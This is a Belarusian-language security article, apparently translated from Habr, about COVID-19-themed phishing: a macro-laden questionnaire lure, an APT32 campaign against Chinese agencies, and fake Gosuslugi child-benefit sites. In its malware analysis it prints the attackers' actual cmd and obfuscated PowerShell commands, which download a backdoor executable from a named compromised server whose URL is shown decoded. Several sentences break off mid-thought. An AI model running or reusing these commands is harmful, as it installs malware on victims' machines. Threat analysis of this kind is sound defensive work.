Зламыснікі працягваюць эксплуатаваць тэму COVID-19, ствараючы ўсё новыя і новыя пагрозы для карыстальнікаў, якія жыва цікавяцца ўсім, што тычыцца эпідэміі. У
Памятайце ў
Бясплатны тэст на COVID-19 не жадаеце?
Іншы паказальны прыклад фішынгу на тэму каранавіруса быў
Пераканаць большасць карыстальнікаў у неабходнасці ўключыць макрасы таксама было нескладана. Для гэтага ўжываўся стандартны трук, калі для запаўнення анкеты трэба спачатку дазволіць макрасы, а значыць – запусціць скрыпт VBA.
Як вы можаце бачыць, скрыпт VBA спецыяльна маскіруецца ад антывірусаў.
У Windows ёсць функцыя чакання, калі прыкладанне чакае /T <секунд>, перш чым прыняць адказ "Так" па змаўчанні. У нашым выпадку скрыпт чакаў 65 секунд, перш чым выдаліць часовыя файлы:
cmd.exe /C choice /C Y /N /D Y /T 65 & Del C:UsersPublictmpdirtmps1.bat & del C:UsersPublic1.txt
А падчас чаканні адбывалася загрузка шкоднаснага ПА. Для гэтага быў запушчаны спецыяльны скрыпт PowerShell:
cmd /C powershell -Command ""(New-Object Net.WebClient).DownloadFile([System.Text.Encoding]::ASCII.GetString([System.Convert]: :FromBase64String('aHR0cDovL2F1dG9tYXRpc2NoZXItc3RhdWJzYXVnZXIuY29tL2ZlYXR1cmUvNzc3Nzc3LnBuZw==')), [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('QzpcVXNlcnNcUHVibGljXHRtcGRpclxmaWxl')) + '1' + '.e' + 'x' + 'e') >C:UsersPublic1.txt
Пасля дэкадавання значэння Base64, скрыпт PowerShell загружае бэкдор, змешчаны на папярэдне ўзламаным вэб-серверы з Нямеччыны:
http://automatischer-staubsauger.com/feature/777777.png
і захоўвае яго пад імем:
C:UsersPublictmpdirfile1.exe
Тэчка ‘C:UsersPublictmpdir’
выдаляецца пры запуску файла 'tmps1.bat', які змяшчае каманду cmd /c mkdir ""C:UsersPublictmpdir"".
Мэтавая атака на дзяржаўныя структуры
Акрамя гэтага нядаўна аналітыкі FireEye паведамілі аб мэтавай атацы APT32, накіраванай на ўрадавыя структуры Уханя, а таксама Міністэрства Неадкладнай Дапамогі Кітая (Chinese Ministry of Emergency Management). У адным з распачатых RTF змяшчалася спасылка на артыкул з New York Times пад назвай
Цікава, што на момант выяўлення ніводны з антывірусаў не дэтэктаваў гэты асобнік паводле дадзеных Virustotal.
Калі афіцыйныя сайты "ляжаць"
Найзыркі прыклад фішынгавай атакі здарыўся ў Расіі літаральна на днях. Нагодай для гэтага стала назначэнне доўгачаканай дапамогі на дзяцей ва ўзросце ад 3 да 16 гадоў. Калі было аб'яўлена аб старце прыёму заяў 12 мая 2020 года, мільёны ірванулі на сайт Дзяржпаслугі па доўгачаканую дапамогу і абрынулі партал не горш за прафесійную DDoS-напад. Калі прэзідэнт сказаў, што "Дзяржпаслугі не справіліся з патокам заявак", у сетцы загаварылі аб тым, што зарабіў альтэрнатыўны сайт прыёму заяў.
Праблема заключаецца ў тым, што сайтаў зарабіла адразу некалькі, і пакуль адзін, сапраўдны па адрасе posobie16.gosuslugi.ru сапраўды прымае заявы, яшчэ
Калегі з «Серчінформ» знайшлі каля 30 новых ашуканскіх даменаў у зоне. Infosecurity a Softline Company адсачылі больш за 70 падобных фэйкавых сайтаў дзяржпаслуг з пачатку красавіка. Іх стваральнікі маніпулююць звыклай сімволікай, а таксама выкарыстоўваюць камбінацыі са слоў gosuslugi, gosuslugi-16, vyplaty, covid-vyplaty, posobie і гэтак далей.
Ажыятаж і сацыяльная інжынерыя
Усе гэтыя прыклады толькі пацвярджаюць, што зламыснікі паспяхова манетызуюць тэматыку каранавіруса. І чым вышэй сацыяльная напруга і чым больш невыразных пытанняў, тым больш шанцаў у ашуканцаў выкрасці важныя дадзеныя, прымусіць людзей самастойна аддаць свае грошы ці проста ўзламаць пабольш кампутараў.
А улічваючы, што пандэмія прымусіла патэнцыйна не гатовых да гэтага людзей масава працаваць з дому, у зоне рызыкі аказваюцца не толькі асабістыя, але і карпаратыўныя дадзеныя. Напрыклад, нядаўна карыстачы Microsoft 365 (былога Office 365) таксама падвергліся фішынгавай атацы. Людзям масава прыходзілі галасавыя “прапушчаныя” паведамленні ва ўкладаннях да лістоў. Аднак фактычна файлы ўяўлялі сабой HTML-старонку, якая адпраўляла ахвяр нападу на
Крыніца: habr.com